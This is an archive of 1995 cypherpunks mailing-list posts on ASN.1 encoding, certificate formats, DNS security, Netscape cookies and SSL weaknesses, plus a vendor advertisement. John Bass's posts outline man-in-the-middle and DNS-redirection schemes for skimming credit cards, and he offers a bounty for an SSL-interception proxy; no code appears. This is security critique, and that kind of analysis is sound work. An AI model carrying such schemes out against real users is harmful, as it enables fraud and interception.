Message-ID: <Pine.SOL.3.91.951002141516.6137B-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


In his message Carl make several statements, some of which I agree with,
and some which I disagree with. Since I'm a protocol wonk, and since I've
been doing ASN.1 and PER/BER stuff recently, I'd like to respond to some
of his points. 

(I spent most of last week off work with a nasty cold,
semi-comatose on the couch, smothered in vapo-rub, surrounded by the 93
specs for ASN.1, BER/DER, and PER, and with nothing on TV but the OJ trial.
What a choice :-)

[A lot of this is leading up to a big rant about the truly ghastly 
packet formats given to us by STT, which I've found loosens more mucus 
than a gallon of cough syrup, and with much the same affect on your 
mental state :-)]

I'm not going to be defending BER (BrainDamaged Encoding Rules), because, 
lets face it, they suck. I'm also not going to be defending X.500, 
because, to a first approximation it completely sucks too. 

In this message I'm just going to address the issue of the inherent
in-efficiency- I'll address the rest in a follow-up message, most
specifically the claim that making mashalling and de-mashalling hard on
the implementor is a good thing. 

It's hard to speak to the issue of code size, since the ISODE compilers,
which are frequently used as a benchmark in this area are so goddam
awful. Even the most naive compilers will generally generate code orders
of magnitude smaller. Instead, we'll take a look at bits on the wire,
and compare the struct dump to what can be done by a 20th century
compiler using a smart set of encoding rules (PER - the packed encoding
rules). 

[ as a side note, I recently wrote some code that had to parse and 
process X.509 certificates - this was for my SSL Keep-Away proxy (it 
needed to crunch the certificate, look for hostname matches in any CN
values, and possible convert the DN into RFC1485 text format). The 
source was only a few K. I was using C++ though (and this didn't hurt 
for once)]


Lets use 3DES as our example. We'll start with a naive specification:

--
LongLong ::= OCTET STRING (SIZE(8)) -- a long long is 8 bytes, er, long
DesKey ::= LongLong
ThreeDes ::= SEQUENCE {
	IV LongLong,
	K1 DesKey,
	K2 DesKey,
	K3 DesKey
}
--
Lets apply the packed encoding rules to this: 
ThreeDes is a SEQUENCE. It has no optional components, so no bits are added
to the encoding. 
The first item, IV, is an OCTET STRING of fixed length 8 bytes. Since the 
length is fixed, no length is encoded - the 8 bytes of the IV are 
appended to the encoding. The same applies to each of the des keys.
 
Thus, we have a bits on the wire total of 32 bytes. The same as in the 
hand crafted encoding. The encoding and decoding are then implemented as 
memcpys. If more information is known about the alignment and position 
in memory  of the fields, and of the key within the buffer, these memcpys can 
be coaleced- this is a local optimisation, rather than a requirement that 
every interoperable implementation use the same language with the same 
compiler.

Now, this example is pretty simple, but with not much thought, we can set 
about improving it to generate fewer bits on the wire. I'll avoid the 
obvious kludge, which is to strip of the parity bytes on each key to save 
three bytes - instead we'll look to the big wins. 

There are several different ways of using 3des which can help us reduce
the size of the encodings in some cases. The first thing we can do is
support variable size IVs (like in rfc1851). We'll restrict the IV to be
either 1 or 2 32 bit chunks. Then we can add extra support for 1des mode
of 3des where all the keys are the same. 

Here's the new definitions:

--
Long ::= OCTET STRING (SIZE(4))

ThreeDes ::=SEQUENCE {
	IV SEQUENCE OF (SIZE(1..2) LONG,
	Key1 DesKey,
	Key2 DesKey OPTIONAL,
	Key3 DesKey OPTIONAL
}
--
Now lets see how the PER treat this value. 
The first thing we encode is the sequence. Since this sequence has 
optional components, we stick one bit onto the output stream for each 
field - if the bit is one, the optional element is present - otherwise, 
it ain't.  Since there are two optional components, we need two bits.

Next, we need to encode the IV. Since this field is of variable length, 
we do need to encode a length this time. The length is constrainted to 
be between 1 and 2 - a range of 1- the minimum number of bits needed to 
encode this is 1, and so a 1 bit field is appended to the encoding. 

Now we encode the longs in the IV; because these values are OCTET 
STRINGS, we need to align ourself on an octet boundary, if we're not 
there already. Once we've emitted any necessary pad bits, we encode the 
IV as the indicated number of 4 byte values. After that we encode the 
first key as described above, and if the second and third key are 
present, we encode those as well. 

If there is room for 3 bits in the byte preceding this encoding (a
likely occurence, especially if the application supports several
different key types (RC4 & IDEA, etc)), this encoding is still 32 bytes
in the worst case, and 12 in the best case. 

To be continued... (unless I get flamed off the list)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Donald E. Eastlake 3rd" <dee@cybercash.com>
Date: Mon, 2 Oct 95 14:25:45 PDT
To: "Kenneth E. Rowe" <kerowe@ncsa.uiuc.edu>
Subject: Re: DNS Security ( was Re: NetScape's dependence upon RSA down...)
In-Reply-To: <v02130502ac95bfa167d5@[141.142.150.60]>
Message-ID: <Pine.SUN.3.91.951002172133.1889C-100000@cybercash.com>
MIME-Version: 1.0
Content-Type: text/plain


Earlier versions of the dsn-security draft did have a revocation mechanism
but the overwhelming consensus in the dns-security working group was to leave
that out of the first version.  I have on my queue writing up my ideas in
this area a separate draft.  Feel free to write up yours. 

Donald

On Mon, 2 Oct 1995, Kenneth E. Rowe wrote:

> At 1:58 PM 10/1/95, Donald E. Eastlake 3rd wrote:
> >DNS security is an important point.  People not aware of efforts in this
> >area may want to check out draft-ietf-dnssec-secext-05.txt which has
> >more or less passed working group last call and is being considered by
> >th Security Area Directory / IESG.  Reference code is also available
> >(see message pasted at end below).
> >
> >Donald
> But the proposed DNS extension itself does not deal with CRL and Key
> Compromise Lists.
> 
> Ken.
> 
> -------------------------------------------------------------
> Kenneth E. Rowe  (kerowe@ncsa.uiuc.edu)
> Senior Security Engineer                (217) 244-5270 (Office)
>         / Security Coordinator          (217) 244-0710 (NCSA IRST)
> National Center for Supercomputing Applications
> *** email ncsa-irst@ncsa.uiuc.edu for computer incident response ***
> 
> 
> 

=====================================================================
Donald E. Eastlake 3rd     +1 508-287-4877(tel)     dee@cybercash.com
   318 Acton Street        +1 508-371-7148(fax)     dee@world.std.com
Carlisle, MA 01741 USA     +1 703-620-4200(main office, Reston, VA)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Mon, 2 Oct 95 15:03:37 PDT
To: raph@cs.berkeley.edu
Subject: Re: Certificate proposal
In-Reply-To: <199510021713.KAA15419@kiwi.cs.berkeley.edu>
Message-ID: <9510022200.AA15553@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>From: Raph Levien <raph@CS.Berkeley.EDU>
>Date: Mon, 02 Oct 1995 10:13:08 -0700

>I am extremely glad to hear Carl propose this. Let me propose something
>just a bit more concrete (Carl might not like it because it contains just
>a hint of ASN.1, but what the hell).

I'll hold my nose while reading :-).

>I propose that the unique name be the MD5 hash of the MOSS public key, as
>formatted according to the MOSS specification (ASCII and all). PGP keys
>can easily be converted into MOSS ones, so it's pretty easy. The hash
>should be expressed as 32 hex digits, so that it can easily be typed in
>or spoken. The only ambiguity in this proposal is where to put the
>newlines, if any. For concreteness, I propose that there be no newlines
>in the public key value.

I see no problem using a hash.  I might use SHA rather than MD5.  MD5 is a
wee bit too short.  But, for what we're doing, MD5 is just fine -- and as a
hash of a public key, the cost of finding alternatives is high enough that
MD5's shortness probably isn't a problem.

However, why convert PGP keys to MOSS and then hash?  Hash the PGP key
straight.

You're right that my proposal was not concrete at all.  To make it
concrete, you'd want to specify the signed message which takes the place of
a certificate.  I tried this once before, roughly, but I never gave it the
effort it deserves.

Let me call this non-certificate a blurk (waiting for a real name).

		------------------------------

For example, you need to identify:

the signee (a public key or hash of a key)
	the public key needs to be identified as to type (RSA, D-H, DSA, ...)
	and the package using it can also be identified (e.g., PGP, MOSS, ...)

the signer (a public key or hash of a key -- as used in the blurk which
	grants authority to the signer)

a text string (or paragraph) giving the attribute being attested to --
	and possibly giving validity dates, etc.

the signature (in some algorithm)  [You might want to allow for multiple
	signatures in different algorithms and/or different packages
	-- to keep the signee from having to send out dozens of blurks
	or storing dozens in a database.]

		------------------------------

The entire thing could be a signed cleartext message:

	signer's key; [signee's key; text] signature (of [])

Alternatively, you could modify the PGP UserID field (or make something
very similar) with raw text (not treated as an ID on the key) and a sig on
the text and signed key.

Signing a cleartext message has some appeal.

As for how this would be used -- my guess from looking at X.509 is that
it's meant for machine parsing and understanding (although I know of no
programs which follow them beyond sig checking).  A cleartext signed
message requires human reading and filing.  However, that's fine.  After
all, it is a human who decides whether to act or not.

If there is a computer deciding whether to act based on the blurk, the
signed text could include SMTP-style tagged text lines for the program to
go find.

Looking forward to more concrete elaborations....

 - Carl

+--------------------------------------------------------------------------+
|Carl M. Ellison      cme@tis.com    http://www.clark.net/pub/cme	   |
|Trusted Information Systems, Inc.   http://www.tis.com/                   |
|3060 Washington Road          PGP 2.6.2:  61E2DE7FCB9D7984E9C8048BA63221A2|
|Glenwood MD  21738         Tel:(301)854-6889      FAX:(301)854-5363       |
+--------------------------------------------------------------------------+

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMHBgrVQXJENzYr45AQG7wgP+MzX/uQsIw5G4YjaRFzPFGV1z6MV5RV5g
xvH6/wv6XLyeZ3DTn/akiwiFO5nl8aSUEq5F7huMByiYctXjlI/05l5KFUxpjNY5
QpQH8hRAIO8PnrItyK0Fg3uFbDzfloSuhhCoJIFlrkAxEXj1CoMKWkN6hlEz1jmy
fY2ceAz6KPo=
=Jdrm
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Mon, 2 Oct 95 15:16:12 PDT
To: baldwin@rsa.com
Subject: Re: Certificate proposal & X509 clarifications
In-Reply-To: <9509028126.AA812663445@snail.rsa.com>
Message-ID: <9510022213.AA15923@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>Date: Mon, 02 Oct 95 12:51:11 PST
>From: "baldwin" <baldwin@RSA.COM (Robert W. Baldwin)>


>	   The designers of version 1 of the X509 certificate format
>have realized that they need to allow issuers to attach all kinds
>of different attributes to a public key.  This lead to version 3
>of the X509 format, which provides for general extensions.

However, in true ASN.1 form, they called for these extensions to be tied to
object identifiers (defining the attribute being defined).  Therefore, you
have to get someone owning an OBJID tree branch to define meanings for you
- -- and you have to publish some worldwide book of mappings, etc.  To me,
this needs nothing more elaborate than text.  In fact, text is a fine
machine-independent coding.

[Thought experiment: imagine Postscript using ASN.1 coding rather than
ASCII.  How many Postscript printers would there be today?]

>	   Question: what's a good way to have the existing PGP public
>key infrastructure interoperate with the X509 infrastructure?

Answer: wait until X.509 dies under its own weight and let them ask how to
interoperate with PGP.

 - Carl

+--------------------------------------------------------------------------+
|Carl M. Ellison      cme@tis.com    http://www.clark.net/pub/cme	   |
|Trusted Information Systems, Inc.   http://www.tis.com/                   |
|3060 Washington Road          PGP 2.6.2:  61E2DE7FCB9D7984E9C8048BA63221A2|
|Glenwood MD  21738         Tel:(301)854-6889      FAX:(301)854-5363       |
+--------------------------------------------------------------------------+

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMHBj0VQXJENzYr45AQHVUAP/Xrb199NEwRoYydDGQK5l424k7neMRpp/
XZtU+7QO760v2YEPmf5EdWZ6S25wKLtaIVUhVr1MLyCRLyfRedXLdYzBqEVlHd2k
dGarIqkB/HOcmjYvZGxnYE+s2gLiTJ1FShgdWWGtC3qCMqlE3h4r5WuiGIotg/IL
WbzKq2oGzYA=
=qBPm
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Publisher Program <TechSupport@jgc.com>
Date: Mon, 2 Oct 95 20:35:24 PDT
To: Techsupport@jgc.com
Subject: Introducing Johnson-Grace
Message-ID: <95Oct2.185011pdt.21953@mail.jgc.com>
MIME-Version: 1.0
Content-Type: text/plain



Dear Web Publisher:

You may have never heard of Johnson-Grace Company, but you have probably
seen the benefits of our image compression technology in America Online and
Apple's eWorld. "ART" compression substantially speeds up image transfers.
In fact, ART formatted images transmit three times faster over conventional
telephone lines than old-style GIFs and JPEGs. The immediate benefit is
dramatically more compelling online content.

Many of the hottest areas on AOL and eWorld are taking advantage of ART
technology, including ABC, Business Week, The Smithsonian, NY Times, and
800-Flowers. Now, Johnson-Grace is able to offer the same benefit to Web
publishers.

To help you immediately reap the rewards of ART image compression on your
Web site, Johnson-Grace is offering publishers the latest copy of our ART
Press(TM) on a FREE trial basis for the remainder of calendar 1995. ART
Press lets you easily convert your images to the ART format with its unique
Web and online publishing features. For example, our proprietary Splash(TM)
feature displays a full-size image in roughly one second; the image then
becomes sharper as more detail is received and decompressed in additional
layers, producing a high-quality final image within seconds.

To get your free trial copy of ART Press, simply sign up for the
"Johnson-Grace Publishers Program," a new program designed specially for Web
and online publishers. At the foot of this email is an enrollment form. Just
fill it out and email or fax it back to us. We'll send you the software
right away (usually within 24 hours).  For even faster results, just sign up
online through the Johnson-Grace Web site (http://www.jgc.com/).

Besides receiving ART Press, another prime benefit of joining our Publishers
Program is that you will be automatically notified when any new versions of
the software become available. Here are two more benefits: 
 
* FREE Technical Support -- For the remainder of calendar 1995 you will
receive free expert technical advice on using ART Press. Support is
available by email or by phone.

* FREE Image Compression -- To help you get started with ART Press,
Johnson-Grace will compress your original images into the ART format free of
charge. Simply provide them to us in BMP, TIFF, or PICT format, and we'll do
the rest.

We've devised a method for allowing both ART and non-ART images to be
accessed from your Web site depending on whether or not an ART-enabled
browser is being used. Johnson-Grace and some of the larger browser
companies have introduced a new extension to HTML, the X-ALTSRC attribute in
the <IMG> tag. (<IMG> is the standard tag used to insert images into a Web
page.)  It indicates to ART-enabled Web browsers that an ART image is
present. When an X-ALTSRC attribute is found, ART-enabled browsers will
automatically use the ART image named in it, bypassing a SRC attribute it
may find naming a GIF (or JPEG) image. Browsers that do not recognize the
X-ALTSRC attribute will ignore it and read the SRC attribute instead, so
there's no risk of incompatibility with these "old-style" browsers.

Currently, AOL's built-in TurboWeb browser as well as other Web browsers
including GNN and TeacherSoft recognize this new HTML attribute,
representing a community of well over three and a half million users.  As
announced by Netscape, Johnson-Grace will be one of the first companies to
provide a free plug-in for Netscape 2.0 which will allow Netscape users to
take advantage of the ART format.  This plug-in will be delivered as a
"virtual bundle" so that support for the ART format will be automatically
added to the browser the first time an ART image is encountered.
Additionally, Johnson-Grace is in discussions with all the other major Web
browser companies to include ART technology in their products. We expect
broad support by the end of the year.  

Check out the Johnson-Grace Web site (http://www.jgc.com) to learn more
about how to use ART's triple-speed advantage on your Web site. You'll also
find a host of other useful information there designed specifically for
publishers.

In the months ahead, look for Johnson-Grace to provide additional "Instant
Publishing" capabilities for Web and online service publishers. For example,
later this year you'll see news of ART speech compression technology that
will enable publishers to author interleaved sound and images for real-time
playback at 14,400 bits per second. Think about what real-time sound can do
for your Web pages!

If you have any questions about the program, feel free to email
techsupport@jgc.com. You can also call Tech Support at (714) 759-0700, or
fax us at (714) 729-4643.

Best regards,

Geoff LeBlond
VP, Licensing
Johnson-Grace Company


Enrollment for Johnson-Grace Publishers Program

Please provide the following information to enroll in the Johnson-Grace
Publishers Program

Name:
Title:
Company Name:
Company Address1:
Company Address2:
Company Address3:
Company Address4:
Telephone Number:
Fax Number:
email Address (email address is required to process your request) :

Version of Software needed
[ ] Windows
[ ] Macintosh
[ ] Both

Type of Publisher (select one)
[ ] Newspaper, Magazine, or Newsletter
[ ] Merchant
[ ] Company (e.g., product and sales information)
[ ] Government or Non-Profit Organization
[ ] Other (please specify) :

Target Audience (check all that apply)
[ ] Web
[ ] Online Service(s)
[ ] Both

Web Site Information
(1) Home Page Location (URL):
(2) Launch Date:
(3) Webmaster e-mail address:

Note: By sending this registration form to Johnson-Grace Company, you agree
to follow
the following Publishers Program restrictions.

(1) Do not use a trial version of ART Press after the end of the trial
evaluation period.
(2) Only Web and online service publishers -- defined as companies,
organizations, or entities that offer content or information for display on
the Web or on an online service for commercial purposes -- may qualify to
participate in the Johnson-Grace Publishers Program.
(3) Do not distribute copies of the program (all users must enroll), or
attempt to reverse engineer the program.
(4) Report any problems with the program to the Publisher Support Hotline at
internet address techsupport@jgc.com, fax 714-729-4643, or telephone
714-759-0700 (ext. 215 or ext. 230).





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 2 Oct 95 19:01:41 PDT
To: cypherpunks@toad.com
Subject: Re: `Hack Microsoft' challenge is NYT Computer News Daily's top story
Message-ID: <ac95e6d30d021004e514@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:37 PM 10/2/95, MIGUELDIAZ@megaweb.com () wrote:

>I don't know about everyone else, but a T-shirt seems a very
>small reward for uncovering a "hole" in the encryption
>algorithm of Microsoft products.  Does that apply to any and
>all bugs?? i.e. not necessarily security problems??

You are of course welcome to offer a richer prize.

Meanwhile, Sameer is the one making the offer, so it's not for us to say
he's being cheap.

Also, the history of science is filled with cases where bets with trivial
payoffs intensely motivated people.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jbass@dmsd.com (John L. Bass)
Date: Mon, 2 Oct 95 18:48:00 PDT
To: Eric Murray <ericm@lne.com>
Subject: Re: NetScape's dependence upon RSA down for the count!
Message-ID: <9510030147.AA15570@dmsd.com>
MIME-Version: 1.0
Content-Type: text/plain


> The point to attacking SSL is to be able to decode a message from any
> browser, without having to do anything extraordinary to the victim's host.
> No cryptosystem is proof against an attacker who can see and
> control everything you do on the client side (i.e. has root in UNIX
> parlance).
> 
> So, while your idea #1 might be interesting or fun to do as far as computer
> security goes, it's not an attack on SSL. 

Agreed, within limits. Security as "Marketed" by NetScape goes far past
just claiming SSL to be secure, including the use of NetScape client
and servers as secure. With this expanded model, attacking NetScapes
claim of security includes attacking the process and enviornment that
they provide to endusers and info mall businesses. In this case
electronicaly distributing clients in a hostile environment is a gross
disregard for endusers security needs, traded off for ease of distribution.

I probably should not have included virus attacks, and just focused
upon the main problem ... unsecured network transmission of clients.

As it stands, a third party with minimal trouble can compromise a very
large number of NetScape clients and capture the dredit card data for
those users who would otherwise expect their transactions to be secure.

To take the ground that their product is secure in a secure environment
is meaningless ... the product value they seem to offer is security in
a non-secure environment - which I don't think is true, and I gather
you might agree?

> That points out the flaw in Netscape's authentication model that
> others have already pointed out on this list.  Admittedly, like Don
> Stephenson just posted, there's not really a good way to distribute
> and authenticate certificates until there's a ubiquitous global
> CA chain.

Again, we agree that this reflect negatively on NetScapes claims of
security in an unsecure environment?
	
As an aside, readers in private have suggested that a signature by
Verilog as the CA my not be required, quoting that until receintly,
NetScape signed their own certificates. This seems that the MITM
can choose his own CA, possibly of his own design to sign false
certificates.
	
> Assume that the attacker Mallet is in the middle and has control of the http
> stream.  Alice clicks on 'open Widget order form' to order a Widget
> and Mallet sends her browser a redirect pointing to his evil web server.
> Alice doesn't notice that the hostname in the url has changed, or
> if she does, she figures that the catalog people have arranged to
> have Mallet's server host their 'secure' transactions (not an unreasonable
> assumption).  Mallet takes the order and pockets the money.
> The hostname in the certificate (Mallet's) matches the hostname
> in the URL (also Mallet's).

Or Mallet places the order in Alice's name defering the chances of detection
until enough cards numbers are aquired to make a run on the bank. There is
tremendous value in forstalling the point of detection and the location of
the MITM becoming known. If Alice get's her goods promptly she is much less
likely to question the transaction.

> Of course this isn't really an attack on SSL per se.  It's an attack on
> the certificate-granting policy- the CA gave a certificate to
> an unscrupulous person (Mallet).

But it is a clear attack on NetScape's advertised "security" for end users.

Almost all sucessfull crooks/thieves have a front business to launder their
money thru. In this case you can steal customers just by redirecting your
competitor's DNS records to your server ... With a similar home page
and ordering/catalog screens they might never notice the switch, certainly
not first time customers. Gee nobody would probably own up to the occasional
named failures that could also cause this.

Somehow I don't think this is what endusers of info mall owners consider
security.

> > > Well of course, if the secret key of the server (or worse yet, certificate 
> > > authority) is compromised, all bets are off.  That's true of just about any 
> > > protocol you can dream up.
> > 
> > I'm not referring to the secret key of _the_ server; I'm referring to the 
> > secret key of _ANY_ server. In the limiting case, such a key can be 
> > obtained by buying one from the CA. 
> 
> Right. That's what I pointed out in an earlier message, although I
> didn't elaborate on it.   The security of Netscape browsers depends
> on Verisign's policy in handing out server certificates.

and on the physical security of the site plus it's network connections,
the trustworthyness of it's internal staff and contractors, and it's ability
to deliver service in the face of failures and disasters, both man made
and natural.

Security includes more than just crypto correctness, in this case it
include denial of service attacks as well has physical site attacks.

In this case I strongly suspect that bombing Verilog would shutdown
net commerce for a while. Certainly it's employees are in a position
to earn high six figures for the key algorithm or a copy of the key
database.

As for the policy, it has to include mom & pops and young business owners
setting out to make their honest fortune on the net ... unfortunately
this profile includes the evil side as well. I don't think restricting
info mall business to the fortune 500 is that we have in mind here.
As such, I don't think screening by the CA takes us very far at all.

> Backing up for a minute, the same problem holds for those neeto
> credit-card readers that Visa and MasterCharge give out to merchants.
> The merchant can be a crook setting up a 'store-front' operation to charge
> to bogus/stolen card numbers, or the employees can steal using the numbers
> they get in the corse of doing business, etc.  There are already
> procedures in place for dealing with this sort of crime.  I'm not
> sure that tricking Verisign into giving out a certificate to a group
> of crackers is really any different than tricking Visa into giving
> a card reader to a group of theives.

Volume greatly affect the risk factor. Giving a merchant number to a
business means that only the number of people that can walk-in or
phone in to that merchants store are at risk. Stolen cards are handled
differently than stolen numbers. Stolen numbers are cross correlated
by past purchase locations by store, and if possible by register location
and employee. There is a strong pointer to the person(s) involved.

Skimming card numbers off the net has the potential to cross vendors,
geographic areas, and other determinates that would aid in locating the
source of the tap. The number of card numbers exposed has the potential
to be several orders of magnitude higher, and remain undetected for quite
some time. The net offers the ability to place a large number of orders
in a short period of time for very high valued merchandice for delivery
to what would appear proper customers ... and using the UPS/FedX example
picking off the proceeds in a centralized low security location. With
another computer store front on the net, you turn the same hijacked goods
into full value shipments in a few days ... and maybe coordinate the
bogus orders and hijackings to meet your customers demands.

Or for an economic terrorist create $100 million in bogus orders and
deliveries to drive the system into failure.

Gone are the days when sheer man-power limited your exposure.  Gone
are the days when a sturdy building, good doors and locks, and a
security system backed by Well Fargo staff would protect your business.

Security in our network context includes not only the protection of
the individual consumer, but the info mall vendors and the future of
the medium as a viable way to do business. NetScape I believe is working
toward all three of these goals, I strongly disagree with the short
cuts and risks they are taking to get there.

John Bass





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jbass@dmsd.com (John L. Bass)
Date: Mon, 2 Oct 95 19:28:43 PDT
To: David_A Wagner <daw@cs.berkeley.edu>
Subject: Re: NetScape's dependence upon RSA down for the count!
Message-ID: <9510030228.AA15693@dmsd.com>
MIME-Version: 1.0
Content-Type: text/plain


Sorry David,

	The offer was for a server/filter/MITM/proxy that logged clear text
not cyphered text for the SSL stream. Combine your program with SLL code
from other sources and 95% of the program is complete. Add to that a way
to produce a valid certificate for the client and you will earn the $50
and a lot of praise for a job well done from everybody.

> > I have a Fifty dollar bill for the first person to submit to the mail box
> > nethack@dmsd.com a working Unix server (with cleartext session logs) which
> > accepts all connections on a unix based host to the www port and redirects
> > them to netscape.com leaving a clear text log of each session's SSL packets
> > in /tmp by session.  All entries become the property of DMS Design. The winner
> > and I will submit a claim for one of Community COnneXion's "I HACKED NETSCAPE"
> > tee shirts as a server hack. (Have Fun!!)
> > 
> 
> This is a trivial program!  I can't believe anyone considers this
> technically difficult.  But hey, who am I to question, if you'll
> pay $50!
> 
> Ok, let me back that up with real code.  Here's a proxy I've been
> using for experimenting, in lieu of root access & tcpdump.

For the rest of you, David gave you a small jump start. Checkout the
web pages at C2.org and netscape.com for access to the ssl prototype
code.

Have fun,
John Bass
Owner, DMS Design





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mlm@netscape.com (Mike McCool)
Date: Mon, 2 Oct 95 13:52:22 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape and privacy
In-Reply-To: <44fin4$rdq@tera.mcom.com>
Message-ID: <44pjd7$22b@tera.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Michael Froomkin (froomkin@law.miami.edu) wrote:
: With all respect to you and to Netscape (I am one who thinks that the
: Netscape participation on this list has reflected very well on the
: participants and the company), I think that the reply "we only collect IP
: addresses" is not fully responsive to the issue.  While I recognize that
: there are implementations that assign a new IP address to every login, I
: understand the current norm to be static IP addresses.  I sure have one. 
: Thus, if you keep a file of my IP address, and a fact about that address,
: you have a database that can be purchased and correllated with another DB,
: which links IP to somehting else, eg telephone numbers (perhaps from a
: contest run on the internet?).  Pretty soon we are at serious
: profiling.... 

Well, I'm the one who wrote the server extension in question; I will 
describe exactly how it works.  Let me start off by saying that it does
not work by IP address, and I would not have implemented anything I 
thought was violating privacy.

Originally, the program was called a bean counter.  Why?  Because there
is exactly one file kept on the server: a file with a number in it.  This
number is the total number of "cookies" given out.

When a client connects to www.netscape.com, the server checks to see if
the client sent a cookie with the request.  This cookie has no information
in it, and even if it did, the server doesn't look at it.  If the client
sent a cookie, the server simply goes on to the next task in completing
the request.

If it does not send a cookie, the extension increments the counter, and 
sends the cookie back to the client.  The client records the cookie and
sends it in the future when it is connecting to the server.

So all it does is count the number of "unique" browser installations there
are.  That's all.  The very most information you could get from this is 
that "this particular browser has connected to netscape.com once in the 
past."  Of course this method isn't foolproof, but it gives us a ballpark
figure of how many people are using our browser, which is all we wanted.

I hope this clears things up.  
	--MLM
--
  Mike McCool * mlm@netscape.com * http://www.netscape.com/people/mlm/  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cs95rro@brunel.ac.uk (Ryan Richard O'Connell)
Date: Mon, 2 Oct 95 13:51:14 PDT
Subject: Re: More forged cancels
In-Reply-To: <44n926$2dj@sundog.tiac.net>
Message-ID: <44pftr$4jf@ccsp-25.brunel.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


Michael R. Grabois (orbit@ix.netcom.com) wrote:
: >From: 73323.603@compuserve.com

: Does this mean that the cancel came from the Compuserve account?

No - he was the original sender of the message. The cancel message must
appear to come from the originator of the post.

-- 
**********************************************
*   Ryan O'Connell <cs95rro@brunel.ac.uk>    *
*  http://http1.brunel.ac.uk:8080/~cs95rro/  *
*    finger:cs95rro@molnir.brunel.ac.uk      *
*   (Includes PGP key and talk location)     *
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Mon, 2 Oct 95 21:28:47 PDT
To: rsalz@osf.org
Subject: Re: Time Lag
Message-ID: <9510030425.AA00286@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


> Sending one message and rigorously studying timestamps in the Received
> lines and using that to draw conclusions about mail propagation is a
> complete waste of time.

Ah, but when there seems to be an ongoing pattern of delays, and many
people check many messages and find that indeed there is a pattern,
it's not a waste of time, no?

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: MIGUELDIAZ@megaweb.com ()
Date: Mon, 2 Oct 95 18:38:32 PDT
To: cypherpunks@toad.com
Subject: Re: `Hack Microsoft' challenge is NYT Computer News Daily's top story
Message-ID: <199510030135.VAA17223@mail-e1a.megaweb.com>
MIME-Version: 1.0
Content-Type: text/plain



>Date:	Mon, 02 Oct 1995 10:34:32 -0400
>From:	Rick Busdiecker <rfb@lehman.com>
>Sender:	owner-cypherpunks@toad.com
>To:	cypherpunks@toad.com
>bcc:	Lehman Brothers Inc.
>Subject:	`Hack Microsoft' challenge is NYT Computer News
> Daily's top story
>
>See http://nytsyn.com/live/Lead/275_100295_074418_19095.html
>
>  MICROSOFT BECOMES NEW TARGET OF HACKING CHALLENGE (10/2) 
>
>  By HEATHER GREEN c.1995 Bloomberg Business News 
>
>  BERKELEY, Calif. -- Microsoft Corp. has been chosen as a
> new target
>  for computer hackers.
>
>  Community Connexion, an Internet service provider that
> last week
>  promised a free T-shirt to anyone who found a flaw in
> Netscape
>  Communications Corp.'s software, extended the challenge
> Friday to
>  include holes in Microsoft products.
>
>  . . .
>

I don't know about everyone else, but a T-shirt seems a very 
small reward for uncovering a "hole" in the encryption 
algorithm of Microsoft products.  Does that apply to any and 
all bugs?? i.e. not necessarily security problems??





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Weld Pond <weld@l0pht.com>
Date: Mon, 2 Oct 95 18:56:52 PDT
To: cypherpunks@toad.com
Subject: re: `NOISE' what crypto is that ? [was Re: NT and C2]
Message-ID: <Pine.BSD/.3.91.951002213910.2066A-100000@l0pht.com>
MIME-Version: 1.0
Content-Type: text/plain



>Weld Pond writes:
>[...]
> > http://www.iquest.net/cgi-bin/gate2?|mmMgT008://bbb.PHDx10.ix0/ibLD1P7=
>i/ExUP0e/A1vxiw.T05smgmRibLD1P7iggyR/D1UgM/ppp/6DYsPv/ibLD1P7i/ExUP0e/Ex=
>UP0egMmN1xAUvTgrmNvgmwONgOmyMyYnlXkKCfX,ve8TxU8Di31,nlXk6CllpW,ve8TxU8Di31=
>MRmypd
> > 
>What kind of (en)coding is that ? some kind of rot13++ ?
>

I know it looks funny but that is the actual URL.  I think it is some kind
of verity search engine they use at IQuest.  To get it to work I had to
paste in the 4 lines individually into Netscape because the URL edit
windows doesn't seem to do linefeeds. 

It's getting pretty bad when you feel like you should uuencode the URL so 
that people get it straight.  Here is the URL again:

http://www.iquest.net/cgi-bin/gate2?|mmMgT008://bbb.PHDx10.ix0/ibLD1P7i
